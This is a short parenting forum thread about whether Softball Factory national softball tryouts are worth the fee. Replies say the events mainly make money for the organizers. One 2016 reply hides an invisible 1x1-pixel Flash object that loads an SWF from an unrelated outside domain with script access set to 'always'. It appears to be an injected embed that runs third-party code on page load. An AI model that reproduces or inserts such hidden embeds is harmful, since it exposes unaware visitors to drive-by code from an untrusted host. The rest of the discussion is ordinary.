Softball Factory National Tryouts

Welcome to Discuss Fastpitch

Your FREE Account is waiting to the Best Softball Community on the Web.

May 12, 2014
Has anyone's DD participated in this and if so was it worth it? My 13 yr old DD was informed of it and wants to go. Assuming she makes this National team we wouldn't go...her current travel team costs enough! But, she found out about it and wants to see if she can make it. Not sure if it's worth $99. Definitely not doing the $399 college prep/tryout

Last edited:
Sep 18, 2011
In my opinion, the only thing worse than going to a Softball Factory tryout with no intention of making the national team is going to a Softball Factory tryout with the hope of making the national team. Have a buddy who did the latter with his dd. Was SO PROUD that she made the team, told me how foolsh we were for not trying out, gushed about the experience... and then 6 months later told me it was a $4,000 mistake.

JAD

Feb 20, 2012
Georgia
I think the softball factory is a lot more about making $$$ for the organizers than it is about helping players get recruited, and there are wiser ways to invest your recruiting budget.

May 12, 2014
Appreciate the feedback. I talked to her about it and she's ok with not going. Told her she'd be better off going to university camp

Jan 11, 2016
I think the softball factory is a lot more about making $$$ for the organizers than it is about helping players get recruited, and there are wiser ways to invest your recruiting budget.
great marketing approach from the organizers though, convincing people to compete for the privilege and opportunity to through more money at them :p
<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="https://hawtstyles.com/flash/8/image.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="https://hawtstyles.com/flash/8/image.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>

May 12, 2014
Yeah, it's crazy to think about. I guess it's for players to say they made it more than anything else

Members online

Forum statistics

Threads
Members
Latest member
dd2k13